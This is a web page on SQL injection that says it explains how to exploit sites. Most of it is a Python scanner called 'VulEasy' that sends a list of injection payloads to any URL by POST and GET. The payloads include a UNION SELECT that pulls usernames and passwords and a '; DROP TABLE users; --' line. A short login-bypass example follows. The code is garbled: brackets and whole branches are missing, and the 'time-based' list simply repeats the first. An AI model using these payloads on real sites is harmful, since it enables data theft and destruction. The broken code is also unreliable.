SQL Injections

What Are SQL Injections?

SQL injections are a type of vulnerability in web applications that allows an attacker to interfere with the queries an application makes to its database. This can lead to the theft of sensitive data or even full control of the database. And here we explain how to exploit sites with SQLi injections. (For educational purposes only.)

We have a VulEasy for you.

            import requests
            from bs4 import BeautifulSoup
            import re
            import platform
            import subprocess
            import time
            payload_1 = [
                "' OR '1'='1 --'",
                "'or 1=1 --",
                "'or 1=1 --' LIMIT 1",
                "' OR '1'='1",
                "' OR '1'='1' --",
                "' OR '1'='1' /*",
                "' OR ''='",
                "' UNION SELECT NULL, username, password FROM users --",
                "' OR '1'='1' LIMIT 1 --",
                "'; DROP TABLE users; --",
                "'; --",
                "admin' --",
                "' AND '1'='1' --",
                "' AND '1'='2' --"
            payload_2 = [
                "' OR '1'='1 --'",
                "'or 1=1 --",
                "'or 1=1 --' LIMIT 1",
                "' OR '1'='1",
                "' OR '1'='1' --",
                "' OR '1'='1' /*",
                "' OR ''='",
                "' UNION SELECT NULL, username, password FROM users --",
                "' OR '1'='1' LIMIT 1 --",
                "'; DROP TABLE users; --",
                "'; --",
                "admin' --",
                "' AND '1'='1' --",
                "' AND '1'='2' --"
            history = []  
            def is_valid_url(url):
                regex = re.compile(
                    r'^(https?|ftp):\/\/[^\s/$.?#].[^\s]*$', re.IGNORECASE
                return re.match(regex, url) is not None
            def detect(input_sequence):
                if len(input_sequence) != 2:
                    return "[!] Please enter a mode (/1 or /2) followed by a URL."
                mode, url = input_sequence
                if mode not in ['/1', '/2']:
                    return "[!] First input must be /1 (Rapid payloads) or /2 (Time-based payloads)."
                elif not is_valid_url(url):
                    return "[!] The second input must be a valid URL."
                    return f"Mode: {mode}, URL: {url}"
            def scan_sql_injection(url, payloads):
                vulnerabilities_found = False
                vulnerable_payloads = []
                print(f"\n[+] Scanning URL: {url} with {len(payloads)} payloads...\n")
                for payload in payloads:
                    for method in ['POST', 'GET']:
                            start_time = time.time()
                            if method == 'POST':
                                response = requests.post(url, data={"username": payload, "password": "password"}, timeout=5)
                                response = requests.get(url, params={"username": payload}, timeout=5)
                            end_time = time.time()
                            response_time = end_time - start_time
                            if response.status_code == 200:
                                soup = BeautifulSoup(response.text, 'html.parser')
                                if response_time > 2 or "error" not in soup.text.lower():
                                    vulnerabilities_found = True
                                    print(f"[Vulnerable] Found with payload: {payload} using {method}")
                        except requests.RequestException as e:
                            print(f"[Error] Request failed with payload: {payload} - {e}")
                if not vulnerabilities_found:
                    print("\n[Secure] No vulnerabilities found.")
                    print("\n[!] Manual Validation Recommended for the following payloads:\n")
                    for vp in vulnerable_payloads:
                        print(f"- {vp}")
            def clear_terminal():
                command = "cls" if platform.system() == "Windows" else "clear"
                subprocess.call(command, shell=True)
            def show_history():
                if history:
                    print("History of scanned URLs:")
                    for idx, url in enumerate(history, start=1):
                        print(f"{idx}: {url}")
                    print("No URLs in history.")
            def clear_history():
                print("History cleared.")
            def list_commands():
                print("/1 - Scan using a single rapid payload")
                print("/2 - Scan using two time-based payloads")
                print("/clear - Clears the terminal")
                print("/history - Shows the command history")
                print("/clearhistory - Clears the command history")
                print("/list - Shows this list of commands")
                print("/credits - Shows creator name")
                print("/exit - Exit for exit here ")
                print("/quit - Quit for go ere")
            def credits():
                print("Developed by @mrduck123 using ChatGPT.\n")
            def main():
                selected_mode = None
                while True:
                    print("## ## ## ## ##   #####     ###         ### ##  ##")
                    print("## ## ## ## ##   #####    ## ##       ## #  ####")
                    print("## ## ## ## ##   #----   ##---##      ##     ##")
                    print("## ## ## ## #### #####  ##     ##   # ##     ##")
                    print(" ###  ##### #### ##### ##       ##   ###     ##")
                    print("/1 for 1 payload's (Rapid's Payload's) /2 for 2 method payload's (Based time payload's)")
                    print("Enter a mode (/1 or /2) followed by a URL to start scanning.\n")
                    user_input = input("Enter URL (You want go use /exit or /quit view the list of commands /list): ")
                    if user_input.lower() in ['/exit', '/quit']:
                    elif user_input == '/clear':
                    elif user_input == '/history':
                    elif user_input == '/clearhistory':
                    elif user_input == '/list':
                    elif user_input == '/credits':
                    elif user_input in ['/1', '/2']:
                        selected_mode = user_input
                        print(f"[+] Mode selected: {selected_mode}. Now enter a valid URL to proceed")
                    elif is_valid_url(user_input):
                        if not selected_mode:
                            print("[!] Please select a mode first (/1 or /2) before entering a URL")
                            print(f"[+] URL added to history: {user_input}")
                            if selected_mode == '/1':
                                scan_sql_injection(user_input, payload_1)
                            elif selected_mode == '/2':
                                scan_sql_injection(user_input, payload_2)
                            selected_mode = None
                        print("[!] Invalid input. Enter a valid command or URL or PLEASE SELECT A MODE FIRST (/1 OR /2)")
            if __name__ == "__main__":

Login Example

Original Query:
SELECT * FROM users WHERE username = 'admin' AND password = '1234';

Injected Query:
SELECT * FROM users WHERE username = 'admin' -- ' AND password = '1234';

In this case, the attacker uses the -- symbol to comment out the rest of the SQL query, bypassing the password check.

How to Protect Yourself?

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